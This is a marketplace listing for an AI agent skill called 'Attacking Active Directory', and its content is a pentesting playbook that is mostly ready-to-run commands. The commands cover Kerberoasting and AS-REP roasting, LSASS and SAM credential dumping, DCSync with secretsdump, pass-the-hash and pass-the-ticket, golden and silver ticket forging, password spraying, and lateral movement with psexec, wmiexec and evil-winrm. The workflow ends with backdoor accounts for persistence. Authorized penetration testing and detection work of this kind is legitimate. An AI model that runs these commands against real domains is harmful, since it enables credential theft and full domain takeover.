AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
SKILL verified Apache-2.0 Self-run

Attacking Active Directory

skill-evilfreelancer-secs-attacking-active-directory · by EvilFreelancer

Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.

No reviews yet
0 installs
0 views
view→install

Install

$ agentstack add skill-evilfreelancer-secs-attacking-active-directory

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access No
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/skill-evilfreelancer-secs-attacking-active-directory)

Reliability & compatibility

Security review passed
0 installs to date
no reviews yet
3d ago

Declared compatibility

Claude CodeClaude Desktop

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Attacking Active Directory? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

Attacking Active Directory

When to Use

  • AD reconnaissance and enumeration
  • Kerberos-based attacks
  • Credential dumping from domain controllers
  • Lateral movement within domains
  • BloodHound attack path analysis
  • Domain persistence techniques

When NOT to Use

  • Non-Windows / Linux-only environments — use enumerating-network-services
  • Cracking the hashes you collected — use cracking-passwords
  • Post-domain-compromise persistence — use establishing-persistence
  • Entra ID / Azure AD as the primary target — use exploiting-cloud-platforms
  • Detecting these attacks defensively — use engineering-detections

A privileged, Kerberoastable account with no logon history is a classic honeyuser: roasting it raises a high-fidelity alert. Check recognizing-deception before roasting an account that looks too convenient.

Route to a Depth Skill

Several AD escalation families are deep enough to have their own procedure skill. When enumeration points at one of these, switch to it — the general methodology here does not carry the tool-specific detail they do.

| Signal | Skill | | --- | --- | | The target is Entra ID / Azure AD, tokens, PRTs, or hybrid-identity sync | exploiting-cloud-platforms |

The domain methodology below (Kerberoasting, DCSync, lateral movement) still applies; these skills specialize a single step of it and hand back here.

Kerberoasting

Windows:

# Check kerberoastable users
.\Rubeus.exe kerberoast /stats

# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt

# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

Linux:

# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt

# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt

# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password

Crack Hashes:

# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt

# John
john --wordlist=wordlist.txt hashes.txt

ASREPRoasting

Windows:

# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired

# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat

Linux:

# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt

# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10

Crack AS-REP:

hashcat -m 18200 hashes.txt wordlist.txt

BloodHound

Data Collection:

# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup

Linux:

# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip

Useful Queries:

# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u

# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p

Credential Dumping

LSASS Dumping:

# Task Manager: Right-click lsass.exe -> Create dump file

# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump  C:\Temp\lsass.dmp full

# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

SAM Dumping:

# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL

DCSync (Domain):

# secretsdump - dump all
secretsdump.py domain.local/user:password@dc.domain.local -just-dc

# Specific user
secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt

# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc

Pass-the-Hash

Windows:

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

Linux:

# NetExec (nxc)
nxc smb 10.10.10.10 -u administrator -H hash
nxc smb 10.10.10.10 -u administrator -H hash -x whoami

# psexec
psexec.py -hashes :hash administrator@10.10.10.10

# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash

Pass-the-Ticket

Export Tickets:

# Mimikatz
sekurlsa::tickets /export

# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10

Import/Use Tickets:

# Mimikatz
kerberos::ptt ticket.kirbi

# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Verify
klist

Linux PtT:

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

# Set ticket
export KRB5CCNAME=ticket.ccache

# Use ticket
psexec.py -k -no-pass domain.local/administrator@dc.domain.local

Overpass-the-Hash

# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt

# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt

Golden/Silver Tickets

Golden Ticket (TGT):

# Requirements: krbtgt hash, Domain SID

# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt

Silver Ticket (TGS):

# Requirements: Service account hash, Service SPN

# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt

Lateral Movement

NetExec (nxc):

# SMB spray
nxc smb 10.10.10.0/24 -u user -p password

# Execute commands
nxc smb 10.10.10.10 -u admin -p password -x whoami
nxc smb 10.10.10.10 -u admin -H hash -x whoami

# Dump SAM
nxc smb 10.10.10.10 -u admin -p password --sam

# Dump LSA
nxc smb 10.10.10.10 -u admin -p password --lsa

PSExec Variants:

# psexec
psexec.py domain/user:password@10.10.10.10

# wmiexec (stealthier)
wmiexec.py domain/user:password@10.10.10.10

# smbexec (no service)
smbexec.py domain/user:password@10.10.10.10

WinRM:

# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash

Enumeration

Domain Info:

# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

Linux Enumeration:

# NetExec (nxc, formerly CrackMapExec)
nxc smb 10.10.10.0/24 -u user -p password --users
nxc smb 10.10.10.0/24 -u user -p password --groups

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"

Quick Workflow

  1. Initial Access → Get domain credentials
  2. Enumeration → Run BloodHound collection
  3. Kerberoasting → Extract and crack service tickets
  4. Lateral Movement → Use creds to move to high-value targets
  5. Credential Dumping → Dump LSASS/SAM on compromised hosts
  6. DCSync → Extract all domain hashes from DC
  7. Persistence → Golden ticket or create backdoor accounts

Common Wins

  • Kerberoasting weak service account passwords
  • ASREPRoasting accounts without preauth
  • BloodHound finding short paths to DA
  • Pass-the-Hash from dumped credentials
  • DCSync with compromised accounts that have replication rights

Tools

  • Rubeus - Kerberos attacks (Windows)
  • Mimikatz - Credential dumping (Windows)
  • Impacket - Comprehensive toolkit (Linux)
  • BloodHound - AD relationship graphing
  • NetExec (nxc) - Swiss army knife for AD (the maintained successor to the archived CrackMapExec)
  • PowerView - AD enumeration (PowerShell)
  • evil-winrm - WinRM access (Linux)

ATT&CK Coverage

Generated from secskills-core/ttp-index.json — edit that file, then run python3 scripts/sync_attack.py --write. Re-verify IDs against the current ATT&CK release before citing them in a report.

Initial Access (TA0001)

  • T1078 Valid Accounts (also Persistence, Privilege Escalation, Defense Evasion)_ — see also cracking-passwords, exploiting-cloud-platforms

Execution (TA0002)

  • T1047 Windows Management Instrumentation — see also escalating-windows-privileges
  • T1569 System Services — see also escalating-windows-privileges

Persistence (TA0003)

  • T1098 Account Manipulation (also Privilege Escalation)_ — see also establishing-persistence
  • T1136 Create Account — see also establishing-persistence
  • T1556 Modify Authentication Process (also Credential Access)_ — see also establishing-persistence

Privilege Escalation (TA0004)

  • T1484 Domain or Tenant Policy Modification (also Defense Evasion)_

Credential Access (TA0006)

  • T1003 OS Credential Dumping — see also cracking-passwords
  • T1003.001 LSASS Memory — see also engineering-detections
  • T1003.003 NTDS
  • T1003.006 DCSync
  • T1110.003 Password Spraying — see also cracking-passwords
  • T1557 Adversary-in-the-Middle (also Collection)_ — see also attacking-wireless-networks
  • T1558 Steal or Forge Kerberos Tickets
  • T1558.003 Kerberoasting — see also cracking-passwords
  • T1558.004 AS-REP Roasting
  • T1649 Steal or Forge Authentication Certificates

Discovery (TA0007)

  • T1018 Remote System Discovery — see also enumerating-network-services
  • T1069 Permission Groups Discovery — see also exploiting-cloud-platforms
  • T1087 Account Discovery — see also exploiting-cloud-platforms

Lateral Movement (TA0008)

  • T1021 Remote Services — see also enumerating-network-services
  • T1021.001 Remote Desktop Protocol
  • T1021.002 SMB/Windows Admin Shares — see also enumerating-network-services
  • T1021.006 Windows Remote Management
  • T1550 Use Alternate Authentication Material (also Defense Evasion)_
  • T1550.002 Pass the Hash — see also cracking-passwords
  • T1550.003 Pass the Ticket

Detection content for any of these: engineering-detections. Proactive search: hunting-threats. Post-compromise: responding-to-incidents.

References

  • https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
  • https://github.com/fortra/impacket
  • https://github.com/GhostPack/Rubeus
  • https://github.com/BloodHoundAD/BloodHound

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.